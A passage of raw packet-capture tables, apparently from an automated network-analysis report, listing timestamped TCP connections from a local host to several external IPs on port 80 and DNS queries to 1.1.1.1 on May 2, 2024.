                                                                                                    May 2, 2024 08:26:26.941250086 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:26.942837000 CEST4976080192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:27.604631901 CEST4976080192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:27.997792006 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:27.997816086 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:27.997827053 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:27.997880936 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:27.997946978 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:27.998092890 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:27.998162985 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:28.011447906 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:28.011591911 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:28.011660099 CEST4976080192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:29.234507084 CEST4976080192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:30.251503944 CEST4976180192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:30.646806002 CEST8049761119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:30.647015095 CEST4976180192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:30.653178930 CEST4976180192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:31.046636105 CEST8049761119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:31.056354046 CEST8049761119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:31.056926012 CEST8049761119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:31.060983896 CEST4976180192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:31.063513041 CEST4976180192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:31.457293987 CEST8049761119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:36.642299891 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:36.830440998 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:36.835719109 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:36.839521885 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.026818037 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.571536064 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.571630955 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.571737051 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.571753025 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.571783066 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.571850061 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.572010994 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.572062016 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.572170973 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.572217941 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.572230101 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.572256088 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.572276115 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.572303057 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.572364092 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.759387970 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.759470940 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.759517908 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.759531975 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.759553909 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.759624958 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.759776115 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.759788036 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.759800911 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.759815931 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.759870052 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.759870052 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:38.342035055 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:39.361160994 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:39.546626091 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:39.547630072 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:39.551518917 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:39.736576080 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.109965086 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.109991074 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110007048 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110022068 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110030890 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:40.110034943 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110047102 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110053062 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:40.110059977 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110070944 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110078096 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:40.110083103 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110100031 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:40.110137939 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110172033 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:40.295114040 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.295135021 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.295146942 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.295164108 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.295176029 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.295239925 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:40.295243025 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.295267105 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.295284033 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:40.295286894 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.295306921 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:40.295325994 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:41.063610077 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:42.082297087 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:42.271070957 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.271166086 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:42.273371935 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:42.461424112 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.461792946 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.461944103 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.462227106 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.462385893 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.849715948 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.849807978 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.849819899 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.849832058 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.849843025 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.849905968 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:42.849905968 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:42.849987030 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.849997997 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.850058079 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.850070000 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.850115061 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.850142956 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:42.855937958 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:43.037242889 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:43.037261963 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:43.037322998 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:43.037342072 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:43.037403107 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:43.037492990 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:43.037506104 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:43.037578106 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:43.037677050 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:43.037693977 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:43.037725925 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:43.038083076 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:43.779907942 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:44.798063993 CEST4976580192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:44.984549999 CEST8049765188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:44.987808943 CEST4976580192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:44.991528034 CEST4976580192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:45.177735090 CEST8049765188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:45.416357994 CEST8049765188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:45.416378975 CEST8049765188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:45.416553020 CEST4976580192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:45.419382095 CEST4976580192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:45.605621099 CEST8049765188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:52.160002947 CEST4976680192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:52.316086054 CEST8049766108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:52.316159964 CEST4976680192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:52.319693089 CEST4976680192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:52.857659101 CEST4976680192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:53.014981031 CEST8049766108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:53.015005112 CEST8049766108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:53.015033007 CEST8049766108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:53.015047073 CEST8049766108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:53.015084982 CEST4976680192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:53.015188932 CEST4976680192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:53.557292938 CEST8049766108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:53.560820103 CEST4976680192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:53.856125116 CEST4976680192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:53.978221893 CEST8049766108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:53.978285074 CEST4976680192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:54.941493988 CEST4976780192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:56.107611895 CEST4976780192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:56.264925957 CEST8049767108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:56.265007973 CEST4976780192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:56.266796112 CEST4976780192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:56.423480988 CEST8049767108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:56.423504114 CEST8049767108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:56.423552036 CEST8049767108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:56.423549891 CEST4976780192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:56.423635006 CEST8049767108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:56.423688889 CEST4976780192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:57.781886101 CEST4976780192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:58.798893929 CEST4976880192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:58.953799963 CEST8049768108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:58.953943968 CEST4976880192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:58.956283092 CEST4976880192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:26:59.111648083 CEST8049768108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:59.111670017 CEST8049768108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:59.111696005 CEST8049768108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:59.111941099 CEST8049768108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:59.111953974 CEST8049768108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:59.111979961 CEST8049768108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:59.111990929 CEST8049768108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:59.112004995 CEST8049768108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:26:59.112059116 CEST4976880192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:27:00.467289925 CEST4976880192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:27:01.487550974 CEST4976980192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:27:01.642909050 CEST8049769108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:27:01.645704985 CEST4976980192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:27:01.647504091 CEST4976980192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:27:01.803841114 CEST8049769108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:27:01.803896904 CEST8049769108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:27:01.803911924 CEST8049769108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:27:01.804029942 CEST4976980192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:27:01.808438063 CEST4976980192.168.2.4108.186.8.158
                                                                                                    May 2, 2024 08:27:01.963685989 CEST8049769108.186.8.158192.168.2.4
                                                                                                    May 2, 2024 08:27:16.121766090 CEST4977080192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:16.297131062 CEST804977091.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:16.297245026 CEST4977080192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:16.299103022 CEST4977080192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:16.474812031 CEST804977091.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:16.474832058 CEST804977091.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:16.474879980 CEST4977080192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:17.810924053 CEST4977080192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:18.834408045 CEST4977180192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:19.009701967 CEST804977191.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:19.015899897 CEST4977180192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:19.015899897 CEST4977180192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:19.191505909 CEST804977191.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:19.191531897 CEST804977191.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:19.193377018 CEST4977180192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:20.529614925 CEST4977180192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:21.548226118 CEST4977280192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:21.723278046 CEST804977291.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:21.723381042 CEST4977280192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:21.727560043 CEST4977280192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:21.902513027 CEST804977291.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:21.902539015 CEST804977291.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:21.902554035 CEST804977291.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:21.902569056 CEST804977291.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:21.902622938 CEST804977291.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:21.902678013 CEST804977291.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:21.902755022 CEST804977291.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:21.902811050 CEST804977291.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:25.037015915 CEST4977380192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:25.211829901 CEST804977391.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:25.211904049 CEST4977380192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:25.215449095 CEST4977380192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:25.390367031 CEST804977391.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:25.390387058 CEST804977391.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:25.390532970 CEST4977380192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:25.395370960 CEST4977380192.168.2.491.195.240.19
                                                                                                    May 2, 2024 08:27:25.570024967 CEST804977391.195.240.19192.168.2.4
                                                                                                    May 2, 2024 08:27:41.802295923 CEST4977480192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:42.148746014 CEST8049774153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:42.148945093 CEST4977480192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:42.150662899 CEST4977480192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:42.998332024 CEST4977480192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:43.169644117 CEST8049774153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:43.170288086 CEST4977480192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:43.348726988 CEST8049774153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:43.348754883 CEST8049774153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:43.348808050 CEST8049774153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:43.348869085 CEST4977480192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:43.654629946 CEST4977480192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:44.674580097 CEST4977580192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:45.022227049 CEST8049775153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:45.023915052 CEST4977580192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:45.026424885 CEST4977580192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:45.373943090 CEST8049775153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:45.374144077 CEST8049775153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:45.374620914 CEST8049775153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:45.375691891 CEST4977580192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:46.529835939 CEST4977580192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:47.556302071 CEST4977680192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:47.898135900 CEST8049776153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:47.898226976 CEST4977680192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:47.900913954 CEST4977680192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:48.241837978 CEST8049776153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:48.241857052 CEST8049776153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:48.241873980 CEST8049776153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:48.242084026 CEST8049776153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:48.242126942 CEST4977680192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:48.242151022 CEST8049776153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:48.582707882 CEST8049776153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:51.520783901 CEST4977780192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:51.866452932 CEST8049777153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:51.866643906 CEST4977780192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:51.868494987 CEST4977780192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:52.211432934 CEST8049777153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:52.211446047 CEST8049777153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:52.211463928 CEST8049777153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:52.211649895 CEST4977780192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:52.213570118 CEST4977780192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:52.214412928 CEST4977780192.168.2.4153.92.8.41
                                                                                                    May 2, 2024 08:27:52.556108952 CEST8049777153.92.8.41192.168.2.4
                                                                                                    May 2, 2024 08:27:57.451116085 CEST4977880192.168.2.4101.99.93.157
                                                                                                    May 2, 2024 08:27:57.642585039 CEST8049778101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:27:57.642699957 CEST4977880192.168.2.4101.99.93.157
                                                                                                    May 2, 2024 08:27:57.835277081 CEST8049778101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:27:57.835331917 CEST4977880192.168.2.4101.99.93.157
                                                                                                    May 2, 2024 08:27:58.029414892 CEST8049778101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:27:58.029445887 CEST8049778101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:27:58.029464960 CEST8049778101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:27:58.035566092 CEST4977880192.168.2.4101.99.93.157
                                                                                                    May 2, 2024 08:28:00.284254074 CEST4977880192.168.2.4101.99.93.157
                                                                                                    May 2, 2024 08:28:01.298763990 CEST4977980192.168.2.4101.99.93.157
                                                                                                    May 2, 2024 08:28:01.490770102 CEST8049779101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:28:01.490874052 CEST4977980192.168.2.4101.99.93.157
                                                                                                    May 2, 2024 08:28:01.684000969 CEST8049779101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:28:01.684062958 CEST4977980192.168.2.4101.99.93.157
                                                                                                    May 2, 2024 08:28:01.877952099 CEST8049779101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:28:01.878011942 CEST8049779101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:28:01.878032923 CEST8049779101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:28:01.878145933 CEST4977980192.168.2.4101.99.93.157
                                                                                                    May 2, 2024 08:28:02.998337030 CEST4977980192.168.2.4101.99.93.157
                                                                                                    May 2, 2024 08:28:04.360995054 CEST4978080192.168.2.4101.99.93.157
                                                                                                    May 2, 2024 08:28:04.552953959 CEST8049780101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:28:04.553045034 CEST4978080192.168.2.4101.99.93.157
                                                                                                    May 2, 2024 08:28:04.745906115 CEST8049780101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:28:04.745999098 CEST4978080192.168.2.4101.99.93.157
                                                                                                    May 2, 2024 08:28:04.938745975 CEST8049780101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:28:04.940349102 CEST8049780101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:28:04.940395117 CEST8049780101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:28:04.943573952 CEST4978080192.168.2.4101.99.93.157
                                                                                                    May 2, 2024 08:28:05.136068106 CEST8049780101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:28:05.136337042 CEST8049780101.99.93.157192.168.2.4
                                                                                                    May 2, 2024 08:28:05.139743090 CEST4978080192.168.2.4101.99.93.157

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    May 2, 2024 08:24:42.305643082 CEST6184053192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:24:43.243988991 CEST53618401.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:25:00.439603090 CEST6327553192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:25:01.043719053 CEST53632751.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:25:18.798521042 CEST5142353192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:25:19.747693062 CEST53514231.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:25:33.814400911 CEST4966253192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:25:34.013406992 CEST53496621.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:25:51.518388987 CEST6130853192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:25:51.734960079 CEST53613081.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:26:05.378520966 CEST6490953192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:26:05.568423986 CEST53649091.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:26:19.580396891 CEST5200153192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:26:20.311863899 CEST53520011.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:26:36.080804110 CEST6425753192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:26:36.639506102 CEST53642571.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:26:51.503310919 CEST5488353192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:26:52.157618999 CEST53548831.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:27:07.446336031 CEST5517453192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:27:07.570497036 CEST53551741.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:27:15.830028057 CEST6472853192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:27:16.118583918 CEST53647281.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:27:30.429325104 CEST6103553192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:27:30.992764950 CEST53610351.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:27:39.048943996 CEST6009253192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:27:39.328984022 CEST53600921.1.1.1192.168.2.4
